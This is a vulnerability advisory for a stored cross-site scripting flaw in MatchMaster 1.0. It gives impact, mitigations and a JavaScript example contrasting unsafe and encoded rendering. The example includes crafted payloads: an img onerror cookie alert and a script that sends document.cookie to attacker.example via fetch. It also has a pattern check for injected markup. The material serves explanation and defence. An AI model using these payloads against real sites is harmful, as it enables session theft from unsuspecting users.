CVE-2025-63713: n/a
Cross-Site Scripting (XSS) vulnerability in SourceCodester "MatchMaster" 1.0 allows remote attackers to inject arbitrary web script or HTML via crafted input in the custom test creation feature. The vulnerability exists because the application fails to properly sanitize user-supplied input in test titles and matching pair items before rendering them in the DOM during test execution.
AI Analysis
Technical Summary
CVE-2025-63713 identifies a Cross-Site Scripting (XSS) vulnerability in SourceCodester's MatchMaster version 1.0, a web-based application for building and taking custom matching tests. The application does not sanitize or encode the test title and the individual matching pair items supplied by a test author, and later writes those strings into the Document Object Model (DOM) when the test is executed. Because the payload is saved with the test and runs for whoever opens it, this behaves as a stored XSS: an attacker creates a test whose title or pair items contain HTML or JavaScript, and that script executes in the browser of every user who loads the test, within the application's origin. From there the attacker can read session cookies that lack the HttpOnly flag, harvest credentials through injected forms, alter the displayed test content, or perform actions in the victim's session.

According to the analysis's CVSS v3.1 assessment, the flaw has a base score of 6.1 (medium) with vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N: reachable over the network, low attack complexity, no privileges required to author a test, user interaction required (the victim must open the crafted test), scope changed because the injected script runs in the victim's browser rather than in the vulnerable component itself, low confidentiality and integrity impact, and no availability impact. Note that the CVE record itself lists no CVSS version (see Technical Details below), so this score is the analysis's own estimate rather than a vendor or CNA rating. The weakness is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). No exploits have been reported in the wild and no official patch had been released at the time of publication. Exposure is limited to environments running MatchMaster 1.0, typically educational institutions or organizations that use it for quizzes and assessments.
Potential Impact
For European organizations the impact depends on whether MatchMaster 1.0 is deployed at all, which is most likely in educational or training settings. A successful attack runs attacker-controlled script in the browsers of users who open a malicious test, allowing theft of session cookies or credentials, tampering with the displayed test content and answers, and actions performed in the victim's session. Confidentiality and integrity of user data and test results are therefore at risk; availability is not. Because test takers open tests as a normal part of using the platform, the user-interaction requirement is a weak barrier: large-scale automated exploitation is limited, but an attacker who can steer victims to a crafted test, or who pairs it with targeted phishing or social engineering, needs nothing further. The absence of an authentication requirement for test creation lets external attackers seed malicious tests without any prior access. Where the platform is used for graded assessments or certification, manipulated results can disrupt operations, and exposure of students' or employees' personal data may trigger GDPR breach-notification and reporting obligations as well as reputational damage.
Mitigation Recommendations
No vendor fix is available, so remediation means changing the application's own code or constraining its deployment. The root fix is output encoding at the point of rendering: every test title and matching pair item must be HTML-entity encoded before it is inserted into the page, or, on the client side, inserted through DOM APIs such as textContent and createElement rather than innerHTML or string-built markup. Input validation (an allow-list of permitted characters for titles and pair items, plus length limits) is a useful second layer but not a substitute for encoding, since quiz content legitimately contains characters such as < and &. Deploy a Content Security Policy that disallows inline scripts and unknown script origins (for example a nonce- or hash-based script-src together with object-src 'none'); this does not remove the bug but stops most injected payloads from executing. Mark session cookies HttpOnly and Secure so that a payload which does execute cannot read them. Until the code is fixed, restrict the custom test creation feature to authenticated, trusted users, review already-stored tests for markup in titles and pair items, and monitor submissions for strings containing tags or on*= event-handler attributes. Educate users not to open tests from unknown authors. A web application firewall with XSS rules tuned to the application's parameters adds detection and some blocking, but WAF filters are routinely bypassed and should not be the only control. Apply the vendor patch as soon as one is released and include input handling in periodic penetration tests.
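The following example is added here to illustrate the vulnerable rendering pattern the description implies next to its hardened form; it is not MatchMaster's own code. The shape of a stored test (a title plus a list of left/right matching pairs), the template's tag names and the helper names are assumptions, and the payloads are constructed for the demonstration.

```javascript
// Added example, not MatchMaster's own code. The shape of a stored test
// (title plus left/right matching pairs) is an assumption about the app's
// data model; the payloads are constructed for the demonstration.
const craftedTest = {
  title: 'Capitals <img src=x onerror="alert(document.cookie)">',
  pairs: [
    { left: 'France', right: 'Paris' },
    // A <script> inserted via innerHTML is not executed by browsers, which is
    // why real payloads favour event handlers such as onerror; both shapes are
    // included to show what the encoder must neutralise.
    { left: '<script>fetch("https://attacker.example/?c="+document.cookie)</script>', right: 'Berlin' },
  ],
};

// Vulnerable pattern: author-controlled strings are spliced straight into
// markup that the page later assigns to innerHTML. The browser parses the
// attacker's tags as real elements and the onerror handler runs in the
// victim's session, in the application's origin.
function renderTestUnsafe(test) {
  let html = `<h1>${test.title}</h1><ul>`;
  for (const p of test.pairs) {
    html += `<li><span class="left">${p.left}</span> = <span class="right">${p.right}</span></li>`;
  }
  return html + '</ul>';
}

// Output encoding for HTML text nodes and double-quoted attribute values:
// every character that can close a text node or attribute is replaced by
// its entity, so untrusted input can only ever be displayed, never parsed.
function escapeHtml(value) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Hardened renderer: same markup, but each untrusted value is encoded at the
// point where it enters the HTML context. In a browser the equivalent is to
// create the elements with document.createElement and assign the author's
// strings through textContent instead of innerHTML.
function renderTestSafe(test) {
  let html = `<h1>${escapeHtml(test.title)}</h1><ul>`;
  for (const p of test.pairs) {
    html += `<li><span class="left">${escapeHtml(p.left)}</span> = <span class="right">${escapeHtml(p.right)}</span></li>`;
  }
  return html + '</ul>';
}

// Review-time check over rendered output: which element names appear that
// the template itself never emits, and does any tag carry an inline on*=
// event handler? Useful as a regression test for the renderer; it is not a
// sanitizer and must not be used to "clean" input.
const TEMPLATE_TAGS = ['h1', 'ul', 'li', 'span'];

function injectedMarkup(html, allowedTags = TEMPLATE_TAGS) {
  const unexpected = new Set();
  for (const m of html.matchAll(/<\/?([a-zA-Z][\w-]*)/g)) {
    const name = m[1].toLowerCase();
    if (!allowedTags.includes(name)) unexpected.add(name);
  }
  return {
    unexpectedTags: [...unexpected],
    inlineHandler: /<[^>]*\bon\w+\s*=/i.test(html),
  };
}

console.log('unsafe:', injectedMarkup(renderTestUnsafe(craftedTest)));
console.log('safe:  ', injectedMarkup(renderTestSafe(craftedTest)));
```

Run with Node to see that the unsafe renderer lets img and script elements and an inline onerror handler through, while the encoded output contains only the template's own tags. Encoding the value at the point of output is what makes the fix context-correct; the same escapeHtml would be wrong inside a JavaScript string or a URL, which is why the encoder must match the context it writes into.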
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Italy, Spain
Technical Details
- Data Version: 5.2
- Assigner Short Name: mitre
- Date Reserved: 2025-10-27T00:00:00.000Z
- CVSS Version: null (no CVSS supplied in the CVE record)
- State: PUBLISHED
Threat ID: 690e3d06dc0204d2f65bb8d1
Added to database: 11/7/2025, 6:40:06 PM
Last enriched: 11/14/2025, 6:54:21 PM
Last updated: 12/24/2025, 12:43:38 AM
Views: 51
Related Threats
- CVE-2025-15048: Command Injection in Tenda WH450 (Medium)
- CVE-2025-68696: CWE-918 Server-Side Request Forgery (SSRF) in jnunemaker httparty (High)
- CVE-2025-68665: CWE-502 Deserialization of Untrusted Data in langchain-ai langchainjs (High)
- CVE-2025-15049: SQL Injection in code-projects Online Farm System (Medium)
- CVE-2025-68664: CWE-502 Deserialization of Untrusted Data in langchain-ai langchain (Critical)